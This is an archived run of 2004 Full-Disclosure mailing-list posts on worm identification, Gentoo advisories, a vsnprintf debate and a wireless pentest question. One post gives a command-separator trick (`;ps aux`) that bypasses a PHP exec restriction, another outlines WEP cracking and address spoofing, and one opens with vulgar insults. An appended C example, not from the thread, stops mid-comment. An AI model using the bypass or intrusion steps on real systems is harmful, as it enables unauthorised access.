_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html



 
RE: [Full-Disclosure] RE: M$ - so what should they do?

bills.bitchhushmail.com
Date: Wed Jun 23 2004 - 19:30:05 CDT


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

He still does not get it. Despite his bizarre ability to bloat his prose
with nothing, probably from coming from the bloated code school of
his principal, he still says nothing. What he isn't is a professional.
A professional anything. Rather a whore from the pimp stable of his bitch
master. Hey I go where the money is. It's not a religion. I don't care.
Give me the money. Take a 5 minute break. Cool off. I can also switch
to where money is today or tomorrow. Exactly like the whore stripper.
I am a good person, but hey I go where the money is. Relax, whoring isn't
religion, take 5 and cool down. I'll make my money now and quit down the
road and get married and then really become someone. ha ha ha ha ha

These are the words of a professional whore, not a professional admin,
security, tech, analyst. The only security that he really knows is
about lining his pocket.

Give him a nickel and he'll say the other systems are the worst.
-----BEGIN PGP SIGNATURE-----
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 2.4

wkYEARECAAYFAkDaIKQACgkQ9hJzGKhH2Le3BACgrMbcchg3PF5YFH4KIklgc+16EGwA
oJi6MRzqW3+oYQoaTfnU1MObUuw8
=aog+
-----END PGP SIGNATURE-----




 
Re: [Full-Disclosure] M$ - so what should they do?

From: Ciro Spider-Man (geekcirogmail.com)
Date: Thu Jun 24 2004 - 04:12:41 CDT


On Tue, 22 Jun 2004 09:04:37 +1200, Stuart Fox (DSL AK)
<stuartfdatacom.co.nz> wrote:
>
>
>
> >
> > How about changing the ".exe" convention? Making a file
> > executable by it's "extension" probably causes a lot of
> > opportunities for problems, doesn't it?
> >
> > Also, the magic file names, like "CON" and "AUX" should go away.
> >
>
> No way! Am I the only person who still uses "copy con filename.txt" to
> create scripts and such at the command line? Please tell me I'm not?
>

I don't use it to create scripts, but I do use it. Frequently use the
filehandles on unix boxen, too, for that matter. Who needs a
fullscreen editor? ;)



 
[Full-Disclosure] trouble with wireless pentest

From: zcrips xrabbitz (zcrips_xrabbitzhotmail.com)
Date: Thu Jun 24 2004 - 06:16:15 CDT


hi everyone,
      I have been taking on my first large and blind wireless pentest and I
have nearly become lost in the jaws of a wireless network and would
appreciate any help. First I'll state what I have so far done and seen.

The network was encrypted but with WEP and large traffic, so I was able to
bruteforce the key. The network in focus is quite large with multiple
subnets and lots of "firewalls".

These I did.

Using kismet I sniffed a whole lot of packets and decoded them with the
found WEP key.

Then using my conventional ettercap and ethereal I looked through the
packets. I sniffed a lot more with ethereal and looked through them for a
similar mac address, but all packets had a local (destination) ip and mac
address.

Now The Problem.

I tried to connect to the network.

I used a nice ip to match one on the network (8.5). I changed mac
addresses to match the host I was spoofing.

Then I tried to route packets to another client, which failed with the
network unreachable error. I tried a traceroute to my target client but it
failed too with the same error.

I used ettercap to passively watch traffic and came up with a
comprehensive list of ip/mac addresses and tried to spoof most of them,
but still my packets didn't get routed. I tried using etherape to watch
traffic flow and come up with a route, but I figured out that nearly all
traffic was internal; most hosts were connecting to each other.

HELP:
    HOW CAN I ROUTE PACKETS THROUGH TO OTHER CLIENTS OR BECOME A CLIENT,
OR IS THERE A BETTER WAY I COULD DO THIS WHOLE PENTEST FROM THE BEGINNING?
PLS ANY HELP WOULD BE APPRECIATED.
 
 
ZIPPERS CRIPS
 
_________________________________________________________________
 
The Zcrips Inc
-----------------------------------------------------------------
a man is only limited by his imaginative abilities
 



 
[Full-Disclosure] Spammers Using Spyware To Fool Users

From: Helmut Hauser (helmut_hauserhotmail.com)
Date: Thu Jun 24 2004 - 06:37:55 CDT


Could that be the reason that I see a whole explosion in Spy and Malware
infections right now?

http://www.techweb.com/wire/story/TWB20040623S0007

Helmut Hauser



 
[Full-Disclosure] New Worm Discovery - Potential Korgo Variant

From: Michael Young (mikeyoungmilestechnologies.com)
Date: Thu Jun 24 2004 - 07:57:06 CDT


Yesterday a large client of ours was taken down by what appears to be a
Korgo variant, but I have been unable to locate any information on this
worm. From what we have discovered, the main process is 'VDisp.exe'. It is
spreading through unpatched systems vulnerable to the LSASS exploit, and
propagates itself through a series of randomly chosen ports. The worm
creates randomly generated services that initialize the process, and also
creates a registry entry in RunServices and Run to load. I am anxious to
hear any feedback anyone has regarding this issue as we are still attempting
to reduce network traffic and alleviate any remaining issues. I have
attached a copy of the executable (rename to .exe).

 

Thank you,

 

Michael Young

IT Consultant

Miles Technologies

(800)-496-8001



 
Re: [Full-Disclosure] Re: your mail

Bart.Lansingkohls.com
Date: Thu Jun 24 2004 - 08:33:51 CDT


Until your crappy office filter is smart enough to know that that is a
potential anonymizer and blocks it as well...like ours does.

Cheers

Bart Lansing
Manager, Desktop Services
Kohl's IT

full-disclosure-adminlists.netsys.com wrote on 06/23/2004 12:04:01 PM:

>
>
> This really isn't that new.
> For years you have been able to do this with babelfish.altavista.com
also.
>
> Simply go to translat.google.com or babelfish.altavista.com type in the
> website you would like to visit and select a language to translate from
->
> to the language you know the website is currently written in and when
you
> submit your query it should by default notice it doesn't need to
translate
> the site or it thinks the site has been translated fairly quickly and it
> hands you the website.
>
>
> This is great for your crappy corporate filters.
>
> :)
>
> > http://exploit.wox.org/tools/googleproxy.html
>
> -Daniel Uriah Clemens
>
> Esse quam videra
> (to be, rather than to appear)
> -Moments of Sorrow are Moments of Sobriety
> { o)2059686335 c)2055676850 }
>




 
Re: [Full-Disclosure] New Worm Discovery - Potential Korgo Variant

From: Cedric Blancher (blanchercartel-securite.fr)
Date: Thu Jun 24 2004 - 09:03:47 CDT


On Thu 24/06/2004 at 14:57, Michael Young wrote:
> Yesterday a large client of ours was taken down by what appears to be
> a Korgo variant, but I have been unable to locate any information on
> this worm. From what we have discovered, the main process is
> ‘VDisp.exe’. It is spreading through unpatched systems vulnerable to
> the LSASS exploit, and propagates itself through a series of randomly
> chosen ports.

Korgo exploits a buffer overflow within FTP daemon installed by Sasser.
That would mean your client systems were previously infected by
Sasser...

--
http://www.netexit.com/~sid/
PGP KeyID: 157E98EE FingerPrint: FA62226DA9E72FA8AECAA240008B480E157E98EE
>> Hi! I'm your friendly neighbourhood signature virus.
>> Copy me to your signature file and help me spread!



 
RE: [Full-Disclosure] New Worm Discovery - Potential Korgo Variant

From: Michael Young (mikeyoungmilestechnologies.com)
Date: Thu Jun 24 2004 - 09:14:19 CDT


The worm clearly exploits the LSASS overflow and is not spreading through
the FTP daemon left by Sasser.

-----Original Message-----
From: Cedric Blancher [mailto:blanchercartel-securite.fr]
Sent: Thursday, June 24, 2004 10:04 AM
To: Michael Young
Cc: full-disclosurelists.netsys.com
Subject: Re: [Full-Disclosure] New Worm Discovery - Potential Korgo Variant

On Thu 24/06/2004 at 14:57, Michael Young wrote:
> Yesterday a large client of ours was taken down by what appears to be
> a Korgo variant, but I have been unable to locate any information on
> this worm. From what we have discovered, the main process is
> ‘VDisp.exe’. It is spreading through unpatched systems vulnerable to
> the LSASS exploit, and propagates itself through a series of randomly
> chosen ports.

Korgo exploits a buffer overflow within FTP daemon installed by Sasser.
That would mean your client systems were previously infected by
Sasser...

--
http://www.netexit.com/~sid/
PGP KeyID: 157E98EE FingerPrint: FA62226DA9E72FA8AECAA240008B480E157E98EE
>> Hi! I'm your friendly neighbourhood signature virus.
>> Copy me to your signature file and help me spread!



 
RE: [Full-Disclosure] New Worm Discovery - Potential Korgo Variant

From: Cedric Blancher (blanchercartel-securite.fr)
Date: Thu Jun 24 2004 - 09:28:23 CDT


On Thu 24/06/2004 at 16:14, Michael Young wrote:
> The worm clearly exploits the LSASS overflow and is not spreading through
> the FTP daemon left by Sasser.

Oops... My mistake... I mixed up Korgo and Dabber...

--
http://www.netexit.com/~sid/
PGP KeyID: 157E98EE FingerPrint: FA62226DA9E72FA8AECAA240008B480E157E98EE
>> Hi! I'm your friendly neighbourhood signature virus.
>> Copy me to your signature file and help me spread!



 
RE: [Full-Disclosure] New Worm Discovery - Potential Korgo Variant

From: Heather M. Guse Bryan (hbryandpntech.com)
Date: Thu Jun 24 2004 - 08:53:46 CDT


http://www.f-secure.com/weblog/
  -----Original Message-----
  From: Michael Young [mailto:mikeyoungmilestechnologies.com]
  Sent: Thursday, June 24, 2004 7:57 AM
  To: full-disclosurelists.netsys.com
  Subject: [Full-Disclosure] New Worm Discovery - Potential Korgo Variant

  Yesterday a large client of ours was taken down by what appears to be a
Korgo variant, but I have been unable to locate any information on this
worm. From what we have discovered, the main process is ‘VDisp.exe’. It is
spreading through unpatched systems vulnerable to the LSASS exploit, and
propagates itself through a series of randomly chosen ports. The worm
creates randomly generated services that initialize the process, and also
creates a registry entry in RunServices and Run to load. I am anxious to
hear any feedback anyone has regarding this issue as we are still attempting
to reduce network traffic and alleviate any remaining issues. I have
attached a copy of the executable (rename to .exe).

  Thank you,

  Michael Young

  IT Consultant

  Miles Technologies

  (800)-496-8001



 
Re: [Full-Disclosure] flaw in php_exec_dir patch

From: npguy (npguywebsurfer.com.np)
Date: Thu Jun 24 2004 - 09:47:24 CDT


is your safe mode on? .. what's your platform?
give more details!

On Wednesday 23 June 2004 07:05 am, VeNoMouS wrote:
> Found a issue last night while testing php_exec_dir patch
>
> if you do the following
>
> $blah=`ps aux`;
> echo nl2br($blah);
>
> php_exec_dir will block the call if you have set the exec_dir parm in php
> or apache
>
> anyway.... if you do this
>
> $blah=`;ps aux`;
> echo nl2br($blah);
>
> it bypasses the exec block and executes the ps due to the ';', as bash
> interprets ';' as a new cmd, I've emailed the author but no response.



 
Re: [Full-Disclosure] New Worm Discovery - Potential Korgo Variant

From: Oliver Heinz (h1oarago.de)
Date: Thu Jun 24 2004 - 10:14:55 CDT


Hello,

we also came across a system with a variant of Korgo/Padobot that was NOT
infected with sasser before!
Infection possibly took place via HTTP; a file containing the virus was
found in the temporary internet files.
Looks like this new padobot is also able to spread via Internet Explorer
vulnerabilities.

Regards, Oliver Heinz

  -------------------------------------------------------------------------
 | arago, | Oliver Heinz |
 | Institut fuer komplexes | Bereichsleiter Systembetrieb & Security |
 | Datenmanagement AG | eMail: heinzarago.de |
 | Am Niddatal 3 | |
 | 60488 Frankfurt am Main | http://www.arago.de/ |
 | Tel: +49-69-40568-401 | PGP-Fingerprint: a5de d4b4 46b3 4d8b 2646 |
 | Fax: +49-69-40568-111 | d4d0 e5fd d842 cc4e 7315 |
  -------------------------------------------------------------------------

  Test your IT security now: http://portscan.netlimes.de/

On Thu, 24 Jun 2004, Cedric Blancher wrote:

> Date: Thu, 24 Jun 2004 16:03:47 +0200
> From: Cedric Blancher <blanchercartel-securite.fr>
> To: Michael Young <mikeyoungmilestechnologies.com>
> Cc: full-disclosurelists.netsys.com
> Subject: Re: [Full-Disclosure] New Worm Discovery - Potential Korgo
> Variant
>
> On Thu 24/06/2004 at 14:57, Michael Young wrote:
> > Yesterday a large client of ours was taken down by what appears to be
> > a Korgo variant, but I have been unable to locate any information on
> > this worm. From what we have discovered, the main process is
> > ‘VDisp.exe’. It is spreading through unpatched systems vulnerable to
> > the LSASS exploit, and propagates itself through a series of randomly
> > chosen ports.
>
> Korgo exploits a buffer overflow within FTP daemon installed by Sasser.
> That would mean your client systems were previously infected by
> Sasser...
>
> --
> http://www.netexit.com/~sid/
> PGP KeyID: 157E98EE FingerPrint: FA62226DA9E72FA8AECAA240008B480E157E98EE
> >> Hi! I'm your friendly neighbourhood signature virus.
> >> Copy me to your signature file and help me spread!
>
>



 
[Full-Disclosure] Evidence of a ISC being hacked?

From: VX Dude (vxdude2003yahoo.com)
Date: Thu Jun 24 2004 - 10:27:11 CDT


http://www.kb.cert.org/vuls/id/654390

Apparently one of the new DHCP vulnerabilities stems
from the following code found in a header file.

#define vsnprintf(buf, size, fmt, list) vsprintf (buf, fmt, list)

Why would any coder replace a more secure function
with a less secure function? Personally I don't see
any reason except to backdoor the software. If so,
then is this evidence that ISC has been hacked and
they're backdoored? Are they keeping the incident
quiet?

Yeah I'm paranoid, but someone has to be ^_*




 
[Full-Disclosure] New Viruses

From: VX Dude (vxdude2003yahoo.com)
Date: Thu Jun 24 2004 - 10:33:17 CDT


Could you guys stop sending me Beagle.X? I already
have enough copies of that. Could I make requests of
which viruses I would like to receive?

hahahahahahahahahahahahahahhohohohohohohohoh

Crapfully yours,
Stiny

_______________________________________________
Full-Disclosure - We belive in it cause we're evil.
Charter:
http://lists.netsys.cn/full-disclosure-charter.html

                



 
[Full-Disclosure] [ GLSA 200406-18 ] gzip: Insecure creation of temporary files

From: Kurt Lieber (kliebergentoo.org)
Date: Thu Jun 24 2004 - 10:05:32 CDT


- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200406-18
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: gzip: Insecure creation of temporary files
      Date: June 24, 2004
      Bugs: #54890
        ID: 200406-18

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

gzip contains a bug potentially allowing an attacker to execute
arbitrary commands.

Background
==========

gzip (GNU zip) is a popular compression program. The included gzexe
utility allows you to compress executables in place and have them
automatically uncompress and execute when you run them.

Affected packages
=================

    -------------------------------------------------------------------
     Package / Vulnerable / Unaffected
    -------------------------------------------------------------------
  1 app-arch/gzip <= 1.3.3-r3 >= 1.3.3-r4

Description
===========

The gzexe script included with gzip contains a bug in the code that
handles temp file creation. If creating the temp file fails, gzexe does
not bail out; instead it executes the command given as its argument.

Impact
======

This could lead to privilege escalation by running commands under the
rights of the user running the self extracting file.

Workaround
==========

There is no known workaround at this time. All users are encouraged to
upgrade to the latest available version.

Resolution
==========

All gzip users should upgrade to the latest stable version:

    # emerge sync

    # emerge -pv ">=app-arch/gzip-1.3.3-r4"
    # emerge ">=app-arch/gzip-1.3.3-r4"

Additionally, once the upgrade is complete, all self extracting files
created with earlier versions of gzexe should be recreated, since the
vulnerability is actually embedded in those executables.

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

     http://security.gentoo.org/glsa/glsa-200406-18.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
securitygentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2004 Gentoo Technologies, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/1.0

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)

iD8DBQFA2u28JPpRNiftIEYRAjlQAJ9s7wy6pONW5wyEttXAMsU4N9/UtQCfRC7W
7UMU9I8ls2SBI7JckNM2wKE=
=+lTo
-----END PGP SIGNATURE-----



 
Re: [Full-Disclosure] New Worm Discovery - Potential Korgo Variant

From: joe smith (joejoesmith.homeip.net)
Date: Thu Jun 24 2004 - 10:27:44 CDT


Kaspersky detects it as Backdoor.Agobot.gen. So another one of the many
other Agobot variants.

Michael Young wrote:

> Yesterday a large client of ours was taken down by what appears to be
> a Korgo variant, but I have been unable to locate any information on
> this worm. From what we have discovered, the main process is
> ‘VDisp.exe’. It is spreading through unpatched systems vulnerable to
> the LSASS exploit, and propagates itself through a series of randomly
> chosen ports. The worm creates randomly generated services that
> initialize the process, and also creates a registry entry in
> RunServices and Run to load. I am anxious to hear any feedback anyone
> has regarding this issue as we are still attempting to reduce network
> traffic and alleviate any remaining issues. I have attached a copy of
> the executable (rename to .exe).
>
>
>
> Thank you,
>
>
>
> Michael Young
>
> IT Consultant
>
> Miles Technologies
>
> (800)-496-8001
>



 
RE: [Full-Disclosure] New Worm Discovery - Potential Korgo Variant

From: Michael Young (mikeyoungmilestechnologies.com)
Date: Thu Jun 24 2004 - 09:39:06 CDT


Thank you for bringing that to my attention. Here is the attachment.
Again, rename to .exe

-----Original Message-----
From: Peter Kosinar [mailto:gooberksp.sk]
Sent: Thursday, June 24, 2004 10:36 AM
To: Michael Young
Subject: Re: [Full-Disclosure] New Worm Discovery - Potential Korgo Variant

> creates a registry entry in RunServices and Run to load. I am anxious to
> hear any feedback anyone has regarding this issue as we are still
attempting
> to reduce network traffic and alleviate any remaining issues. I have
> attached a copy of the executable (rename to .exe).

Are you sure you didn't forget to attach the attachment ? Or was it
stripped from the mail somewhere on the route ?

Yours sincerely,

Peter Kosinar




 
RE: MCAFEE E-MAIL SCAN ALERT!~RE: [FULL-DISCLOSURE] NEW WORM DISCOVERY - POTENTIAL KORGO VARIANT

From: Chontzopoulos Dimitris (dchontzoabc.gr)
Date: Thu Jun 24 2004 - 11:43:24 CDT


McAfee says <W32/Gaobot.worm.gen.j>

> -----Original Message-----
> From: full-disclosure-adminlists.netsys.com [mailto:full-disclosure-adminlists.netsys.com] On Behalf Of Michael Young
> Sent: Thursday, June 24, 2004 5:39 PM
> To: 'Peter Kosinar'; full-disclosurelists.netsys.com
> Subject: MCAFEE E-MAIL SCAN ALERT!~RE: [FULL-DISCLOSURE] NEW WORM DISCOVERY - POTENTIAL KORGO VARIANT
>
>
> Attachment file : VDisp.save
> Virus name: W32/Gaobot.worm.gen.j
> Action taken : Unable to Clean...
>
> Attachment file : VDisp.save
> Virus name: W32/Gaobot.worm.gen.j
> Secondary Action taken : Moved...
>
> Thank you for bringing that to my attention. Here is the attachment.
> Again, rename to .exe
>
> -----Original Message-----
> From: Peter Kosinar [mailto:gooberksp.sk]
> Sent: Thursday, June 24, 2004 10:36 AM
> To: Michael Young
> Subject: Re: [Full-Disclosure] New Worm Discovery - Potential Korgo Variant
>
> > creates a registry entry in RunServices and Run to load. I am anxious to
> > hear any feedback anyone has regarding this issue as we are still
> attempting
> > to reduce network traffic and alleviate any remaining issues. I have
> > attached a copy of the executable (rename to .exe).
>
> Are you sure you didn't forget to attach the attachment ? Or was it
> stripped from the mail somewhere on the route ?
>
> Your sincerely,
>
> Peter Kosinar
>



 
SV: MCAFEE E-MAIL SCAN ALERT!~RE: [FULL-DISCLOSURE] NEW WORM DISCOVERY - POTENTIAL KORGO VARIANT

From: Peter Kruse (krusekrusesecurity.dk)
Date: Thu Jun 24 2004 - 12:34:52 CDT


Hi,

>McAfee says <W32/Gaobot.worm.gen.j>

Yes, this is indeed a new Gaobot/Agobot variant.

Regards
Peter Kruse
http://www.csis.dk



 
[Full-Disclosure] Re: New Worm Discovery - Potential Korgo Variant

From: Helmut Hauser (helmut.hauserintraplan.de)
Date: Thu Jun 24 2004 - 13:01:04 CDT


In my opinion
this is an unknown Agobot variant [as told by NAI]

TrendMicro calls it:
http://www.antivirus.com/vinfo/virusencyclo/default5.asp?VName=DOS_AGOBOT%2EGEN
(it changes the hosts file)
It is packed with one of the latest PECompact versions.

It puts itself in the usual suspect run keys + services as "Display Driver",
VDisp.exe

Run autoruns from www.sysinternals.com; the startup entries are listed there

Will it never stop?

The author of agobot was (thankfully) arrested, but the source is in the
wild and some script kiddies are still there :(

Helmut Hauser



 
Re: [Full-Disclosure] Evidence of a ISC being hacked?

Valdis.Kletnieksvt.edu
Date: Thu Jun 24 2004 - 12:54:52 CDT


On Thu, 24 Jun 2004 08:27:11 PDT, VX Dude <vxdude2003yahoo.com> said:
> http://www.kb.cert.org/vuls/id/654390
>
> Apparently one of the new DHCP vulnerabilities stems
> from the following code found in a header file.
>
> #define vsnprintf(buf, size, fmt, list) vsprintf (buf, fmt, list)
>
> Why would any coder replace a more secure function
> with a less secure function? Personally I don't see
> any reason except to backdoor the software.

Hmm.. are you perchance new to software development? ;)

Quoting one of the advisories:

   VU#654390 discusses C include files for systems that do not support
   the bounds checking vsnprintf() function. These files define the
   bounds checking vsnprintf() to the non-bounds checking vsprintf()
   function. Since vsprintf() is a function that does not check bounds,
   the size is discarded, creating the potential for a buffer overflow
   when client data is supplied. Note that the vsnprintf() statements are
   defined after the vulnerable code that is discussed in VU#317350.

It's easier to just #define the critter than to re-re-invent the C code
for vsnprintf() (which isn't always trivial, as your vsnprintf() has to play
nice with the vendor's stdio - this can be .. umm... "interesting" if the
innards of the vendor stdio are more bizarre than usual...

Go ahead - go and re-write a vsnprintf, and compare that to the time it
takes to do the #define, and remember that this situation almost certainly
came up because some *other* coder had changed a vsprintf() to a vsnprintf()
for the obvious security reasons, it built OK on the other coder's test box,
they released a -rc release candidate, and the build broke on OTHER systems
because there wasn't a vsnprintf() in the vendor libc - and your boss is
telling you TO GET THE THING TO BUILD, NOW....

The programmer who is willing to swear on a Bible that they have *never* in
their professional career done something like this because they were in a
time crunch is either a newbie or a complete liar.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)
Comment: Exmh version 2.5 07/13/2001

iD8DBQFA2xVscC3lWbTT17ARAtPMAKDqrL+7I82HFBvOOYIx9ywpBCAT9wCgqXSA
oxfzSJSs6WMUKuktlS3n408=
=fR2w
-----END PGP SIGNATURE-----



 
Re: [Full-Disclosure] Evidence of a ISC being hacked?

From: VX Dude (vxdude2003yahoo.com)
Date: Thu Jun 24 2004 - 13:22:18 CDT


--- Valdis.Kletnieksvt.edu wrote:
<snip>
> It's easier to just #define the critter than to
> re-re-invent the C code
> for vsnprintf() (which isn't always trivial, as your
> vsnprintf() has to play
> nice with the vendor's stdio - this can be .. umm...
> "interesting" if the
> innards of the vendor stdio are more bizzare than
> usual...
<snip>

Good point, personally I wouldn't think that making a
small wrapper would take that long, but then again I
haven't done it, and I haven't done it under stress and
a time crunch. I code for fun and not profit which is
pretty stress free.

-Stiny

                



 
Re: [Full-Disclosure] Evidence of a ISC being hacked?

Valdis.Kletnieksvt.edu
Date: Thu Jun 24 2004 - 14:38:27 CDT


On Thu, 24 Jun 2004 11:22:18 PDT, VX Dude said:

> Good point, personally I wouldn't think that making a
> small wrapper would take that long, but then again I
> havent done it, and I havent done it under stress and
> a time crunch. I code for fun and not profit which is
> pretty stress free.

Writing a small wrapper doesn't do anything any better than
just using a #define - the *basic* problem is that there's no way
for any wrapper or preprocessor magic to know the "right" answer
to the most crucial difference - vsnprintf takes a 'length' parameter,
and you have 2 basic choices:

1) The wrapper/define/handwaving discards it and prays.

2) The replacement function does a proper job of doing a full enough
emulation of vsnprintf to keep track of "length so far" and stop
when it gets full (not as easy as you might think - for fun, compute
how many bytes this takes:

   vsprintf(target,"%#'LG",foo);

(Note the evilness involved in the ' flag, which is locale-dependent ;)

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)
Comment: Exmh version 2.5 07/13/2001

iD8DBQFA2y2zcC3lWbTT17ARAr7zAKDJ261SguKTJAH/faG+1wKGvF8dMgCdFOms
8iOwY5LWTHpPMJO5MNEaxGM=
=cOfP
-----END PGP SIGNATURE-----



 
[Full-Disclosure] [ GLSA 200406-19 ] giFT-FastTrack: remote denial of service attack

From: Thierry Carrez (koongentoo.org)
Date: Thu Jun 24 2004 - 15:39:22 CDT


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200406-19
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Low
     Title: giFT-FastTrack: remote denial of service attack
      Date: June 24, 2004
      Bugs: #54452
        ID: 200406-19

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

There is a vulnerability where a carefully crafted signal sent to the
giFT-FastTrack plugin will cause the giFT daemon to crash.

Background
==========

giFT-FastTrack is a plugin for the giFT file-sharing application. It
allows giFT users to connect to the fasttrack network to share files.

Affected packages
=================

    -------------------------------------------------------------------
     Package / Vulnerable / Unaffected
    -------------------------------------------------------------------
  1 net-p2p/gift-fasttrack <= 0.8.6 >= 0.8.7

Description
===========

Alan Fitton found a vulnerability in the giFT-FastTrack plugin in
version 0.8.6 and earlier. It can be used to remotely crash the giFT
daemon.

Impact
======

Attackers may use this vulnerability to perform a Denial of Service
attack against the giFT daemon. There is no risk of code execution.

Workaround
==========

There is no known workaround at this time. All users are encouraged to
upgrade to the latest available version.

Resolution
==========

All users should upgrade to the latest available version of
gift-fasttrack:

    # emerge sync

    # emerge -pv ">=net-p2p/gift-fasttrack-0.8.7"
    # emerge ">=net-p2p/gift-fasttrack-0.8.7"

References
==========

  [ 1 ] giFT-FastTrack announcement
        http://gift-fasttrack.berlios.de/

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

     http://security.gentoo.org/glsa/glsa-200406-19.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
securitygentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2004 Gentoo Technologies, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/1.0

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFA2zv6vcL1obalX08RAvglAJ9ps20fsJt68KOm66rRk/9W3KZfGQCZAQ83
ZcoXMOoCfk3geRVrx6Y2MqY=
=ikRU
-----END PGP SIGNATURE-----



 
Re: [Full-Disclosure] Evidence of a ISC being hacked?

From: Pavel Kankovsky (peakargo.troja.mff.cuni.cz)
Date: Thu Jun 24 2004 - 16:39:56 CDT


On Thu, 24 Jun 2004 Valdis.Kletnieksvt.edu wrote:

> It's easier to just #define the critter than to re-re-invent the C code
> for vsnprintf() (which isn't always trivial, as your vsnprintf() has to play
> nice with the vendor's stdio - this can be .. umm... "interesting" if the
> innards of the vendor stdio are more bizarre than usual...

vsnprintf() does not have to "play nice" with stdio. It does not have to
play with stdio at all. You don't need to mess with stdio in order to
stuff some characters into an array.

> Go ahead - go and re-write a vsnprintf, and compare that to the time it
> takes to do the #define

It is rather easy as long as everything you need is common string and
integer directives. Indeed, floats are tricky. Exotic C99 is even more
tricky. But I think the set of printf features required by dhcpd and
similar programs is (or should be) pretty small.

--Pavel Kankovsky aka Peak [ Boycott Microsoft--http://www.vcnet.com/bms ]
"Resistance is futile. Open your source code and prepare for assimilation."



 
[Full-Disclosure] Re: [FD] Evidence of a ISC being hacked?

From: Thomas Binder (full-disclosurearago.de)
Date: Thu Jun 24 2004 - 17:33:25 CDT


Hi!

On Thu, Jun 24, 2004 at 03:38:27PM -0400, Valdis.Kletnieksvt.edu wrote:
> 1) The wrapper/define/handwaving discards it and prays.
>
> 2) The replacement function does a proper job of doing a full enough
> emulation of vsnprintf to keep track of "length so far" and stop
> when it gets full (not as easy as you might think - for fun, compute
> how many bytes this takes:

3) Only useable on systems with /dev/null: fopen() /dev/null,
   vfprintf() to that handle and take the return value - it
   contains the number of characters written (or -1 on error).
   Then malloc() a temporary buffer to hold the complete output,
   vsprintf() to it and strncpy() to the destination array.

Of course, this might not be a suitable solution in a performance
sensitive application, but it's only a workaround for a missing
function anyway.

Ciao

Thomas

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.3 (IRIX64)

iD8DBQFA21a1J+FIGCekM7URAi4pAKC6cojtZlaR86CBiSVGWAaVw2WdPQCgqlyG
2FneIRRaisRzIwEcxEX9wZU=
=znUu
-----END PGP SIGNATURE-----

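The two repair routes argued over above, Valdis's option 2 (a replacement that keeps counting after the buffer is full) and Thomas's option 3 (let the vendor's vfprintf() measure against /dev/null, then copy a bounded prefix), written out as an added example. This is not code from the thread, from ISC or from dhcpd; the names my_vsnprintf and devnull_vsnprintf are mine, and the directive subset the first one accepts (%s %d %x %c %%) is an assumption following Pavel's point that a daemon needs only common string and integer directives. Both return the full length the way C99 vsnprintf does, so a caller can detect truncation.

```c
#include <stdarg.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Sink for my_vsnprintf: stores at most cap-1 bytes but keeps counting, so
 * the caller learns how long the complete output would have been. */
struct sink { char *buf; size_t cap, len; };
static void put(struct sink *s, char c)
{
    if (s->cap > 0 && s->len < s->cap - 1)
        s->buf[s->len] = c;
    s->len++;                           /* counted even when not stored */
}

static void put_unsigned(struct sink *s, unsigned long v, unsigned base)
{
    char tmp[sizeof v * 8 + 1];         /* digits, least significant first */
    size_t i = 0;
    do { tmp[i++] = "0123456789abcdef"[v % base]; v /= base; } while (v);
    while (i)
        put(s, tmp[--i]);
}

/* Option 2: a bounded formatter for the directives a daemon actually uses
 * (%s %d %x %c %%; no width, precision, floats or the ' flag).  Returns the
 * full length like C99 vsnprintf, or -1 for an unknown directive. */
int my_vsnprintf(char *buf, size_t cap, const char *fmt, va_list ap)
{
    struct sink s = { buf, cap, 0 };
    for (; *fmt; fmt++) {
        if (*fmt != '%') { put(&s, *fmt); continue; }
        switch (*++fmt) {
        case 's': {
            const char *p = va_arg(ap, const char *);
            for (p = p ? p : "(null)"; *p; p++) put(&s, *p);
            break;
        }
        case 'd': {
            int v = va_arg(ap, int);
            unsigned long mag = (unsigned long)v;
            if (v < 0) { put(&s, '-'); mag = 0UL - mag; }  /* INT_MIN-safe */
            put_unsigned(&s, mag, 10);
            break;
        }
        case 'x': put_unsigned(&s, va_arg(ap, unsigned), 16); break;
        case 'c': put(&s, (char)va_arg(ap, int)); break;
        case '%': put(&s, '%'); break;
        default:                        /* refuse rather than guess a size */
            if (cap > 0) buf[0] = '\0';
            return -1;
        }
    }
    if (cap > 0) buf[s.len < cap ? s.len : cap - 1] = '\0';
    return (int)s.len;
}

/* Option 3: let the vendor's own vfprintf() count the bytes against
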